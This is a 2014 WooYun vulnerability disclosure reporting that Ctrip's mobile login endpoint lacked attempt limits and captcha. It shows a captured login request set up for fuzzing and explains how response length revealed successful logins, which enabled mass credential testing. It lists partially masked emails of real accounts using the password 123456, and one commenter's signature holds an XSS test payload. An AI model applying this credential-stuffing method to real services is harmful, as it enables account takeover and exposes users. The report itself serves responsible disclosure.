当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075056

漏洞标题:携程某接口设计缺陷可进行扫号(可获取大量账号密码)

相关厂商:携程旅行网

漏洞作者: niliu

提交时间:2014-09-04 19:33

修复时间:2014-10-24 19:36

公开时间:2014-10-24 19:36

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-04: 该漏洞正等待厂商内部评估
2014-09-04: 厂商已经确认,与白帽子共同解决该漏洞中,漏洞信息仅向厂商公开
2014-09-24: 细节向核心白帽子及相关领域专家公开
2014-10-04: 细节向普通白帽子公开
2014-10-14: 细节向实习白帽子公开
2014-10-24: 细节向公众公开

简要描述:

接口限制总有遗漏,涉及用户数据,提交!

详细说明:

问题接口出现在携程触屏版登陆

http://m.ctrip.com/html5/Account/Login.html


11.jpg


经简单测试发现登陆没有错误次数限制,也不会弹出验证码。
于是随便输入用户名,密码。登陆时抓包进行fuzz
抓包数据

POST /html5/Account/LoginValidation HTTP/1.1
Host: m.ctrip.com
Proxy-Connection: keep-alive
Content-Length: 292
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: http://m.ctrip.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X; en-us) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://m.ctrip.com/html5/Account/Login.html
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie: 
UID=§admin§&Password=2ec5ed31996e031281e8da203fa1a2851921cbb7b2cd27bdf4a0ab9fe430f035391638c46e25e821035b5ff71a08b84cb9eaa7573d5988122483ec14ca2331c42e61bb74ff7d1b6853bafaf9b09c376a462fa3c8a582e752b2fcff9dcdf3af080558daea8fd973afd92b4b42e2c64377e5876257484eb4a671c3b83cc315d138&IsRemember=false


可以看到密码是经过加密的。
我就以密码不变,随便找个最简单的弱口令123456来进行测试
测试一部分邮箱账号。

04174231ccd1d2305ced7bfa2d65f4dd59f9724e.jpg


返回包402的为密码错误,大于402的都是可以登陆的
贴出部分证明

guo
b***e@126.com
c***z@sohu.com
e***0@163.com
s***f@163.com
9***8@qq.com
l***x@163.com
e***@126.com
lx***37@sina.com
s***ow@126.com
5***07@qq.com
n***8@126.com
***ND@163.COM
z***01@163.com
de***ha@sina.com
13***0@139.com
46***7@163.COM
l***08@163.com
s***ngel@163.com
x***n_2001@126.com
mu***@126.com
so***i3226@126.com
4***224@qq.com
ho***en@gmail.com
i***lc@sina.com
j***5@gmail.com
and***st@hotmail.com
j***ao@126.com
hu***n@qq.com
2***32@qq.com
7***692@qq.com
pr***j@126.com
l***@163.com
54***36@QQ.com
chi***32@163.com


以上这些账号密码均为123456,。
贴部分登陆证明
b***e@126.com

041744135a98ad5775da95b1cc2e1800a417b749.jpg


5***7@qq.com

04174506b2922043ffa947c977fa3dd68bcb7094.jpg


hu***n@qq.com

04174616b1903d3d673273f3635d786c1a2146a9.jpg


g**

04174707c24faced453bf2448467c6bd1bc7ef1f.jpg


2.jpg


漏洞证明:

综上所述,密码可以变换其他的来进行测试。
在大数据时代,基于之前泄露的各种用户数据进行测试,影响用户数量还是很可观的.

修复方案:

对触屏版登陆接口进行登陆次数限制。
加入验证码进行限制。

版权声明:转载请注明来源 niliu@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-04 19:35

厂商回复:

漏洞已确认真实存在,并已安排人处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-10-24 19:55 | 切克脑 ( 实习白帽子 | Rank:31 漏洞数:9 | z..)

    这么多$$$$$$$$$$$$$$$$$$$$$$$

  2. 2014-10-24 20:21 | Mody ( 普通白帽子 | Rank:110 漏洞数:27 | "><img src=x onerror=alert(1);> <img s...)

    为何这么多$$$???

  3. 2014-10-24 20:33 | 咖啡 ( 实习白帽子 | Rank:48 漏洞数:20 )

    邮箱是怎么搞到的

  4. 2014-10-24 21:30 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    卧槽、3000啊

  5. 2014-10-24 22:43 | 切克脑 ( 实习白帽子 | Rank:31 漏洞数:9 | z..)

    呀$$$$$$$$$$$$没了

  6. 2014-10-24 22:44 | 切克脑 ( 实习白帽子 | Rank:31 漏洞数:9 | z..)

    点进去就不显示了...

  7. 2014-10-26 00:25 | abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)

    @老和尚 $$$。。。一个是几十几百 两个是几百几千 三个 这漏洞都上 国家级刊物 计算机安全了